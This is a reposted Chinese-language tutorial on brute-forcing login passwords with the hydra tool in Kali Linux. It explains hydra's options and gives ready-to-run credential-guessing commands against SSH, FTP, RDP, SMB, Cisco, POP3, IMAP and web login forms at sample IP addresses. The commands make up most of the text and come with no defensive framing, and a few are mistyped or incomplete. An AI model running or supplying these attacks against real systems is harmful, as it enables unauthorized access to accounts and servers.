8.使用hydra对端口进行爆破
如果對開啟端口的服務不清楚,請看我之前寫的文章:https://www.cnblogs.com/bmjoker/p/8833316.html
2018,網站的防護(sql,xss...)的安全保護也已經上升了一個等級,但是由于管理員的安全意識薄弱,網站弱口令漏洞依然猖獗,不信可以看補天的漏洞提交記錄,弱口令依然是漏洞中的佼佼者,當然弱口令并不僅限于網站的后臺登陸弱口令,還有端口,比如 Ftp:21,ssh:22,Telnet:23,Pop3:110,3389遠程登陸,8080中間件Tomcat,7001中間件Weblogic,3306 Mysql數據庫(phpmyadmin),1433 SQLServer數據庫,5432 Postgresql數據庫...
端口掃描不用多講,鄙人還是覺得nmap好一點,但是如何批量掃的話,丟包率可能高一點。
對于端口的爆破,首先要有一個好的字典,然后再有一個好的工具,工具的話,python腳本,超級弱口令檢測工具....這里主要介紹kali里面hydra的爆破,應為hydra支持幾乎所有協議的在線密碼破解,并且容錯率好,不過能不能爆破成功還是需要你有一個好的字典。
---------------------------------------------------------------
語法:
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]參數詳解:
-R 根據上一次進度繼續破解 -S 使用SSL協議連接 -s 指定端口 -l 指定用戶名 -L 指定用戶名字典(文件) -p 指定密碼破解 -P 指定密碼字典(文件) -e 空密碼探測和指定用戶密碼探測(ns)-M <FILE>指定目標列表文件一行一條
-f 在使用-M參數以后,找到第一對登錄名或者密碼的時候中止破解。 -C 用戶名可以用:分割(username:password)可以代替-l username -p password -o <FILE>輸出文件 -t 指定多線程數量,默認為16個線程
-w TIME 設置最大超時的時間,單位秒,默認是30s -vV 顯示詳細過程 server 目標IP service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2......)
使用案例:
爆破 ssh:22 端口命令:
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh爆破 Ftp:21 端口命令(指定用戶名為root):
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftpget方式提交,破解web登錄(指定用戶名為admin):
hydra -L user.txt -p password.txt -t 線程 -vV -e ns ip http-get /admin/ hydra -l admin -p password.txt -t 線程 -vV -e ns -f ip http-get /admin/index.phppost方式提交,破解web登錄:
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。
破解https:
破解teamspeak:
hydra -l admin -P passworrd.txt -s 端口號 -vV 192.168.0.132 teamspeak破解cisco:
hydra -P password.txt 192.168.0.132 cisco hydra -m cloud -P password.txt 192.168.0.132 cisco-enable破解smb:
hydra -l administrator -P password.txt 192.168.0.132 smb破解pop3:
hydra -l root -P password.txt my.pop3.mail pop3破解rdp(3389端口):
hydra -l administrator -P password.txt -V 192.168.0.132 rdp破解http-proxy:
hydra -l admin -P passwprd.txt http-proxy://192.168.0.132破解imap:
hydra -L user.txt -p secret 192.168.0.132 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN?
就先介紹到這里~~~
?
轉載于:https://www.cnblogs.com/bmjoker/p/9977881.html
總結
以上是生活随笔為你收集整理的8.使用hydra对端口进行爆破的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: day11-(cookiesession
- 下一篇: python调用.net动态库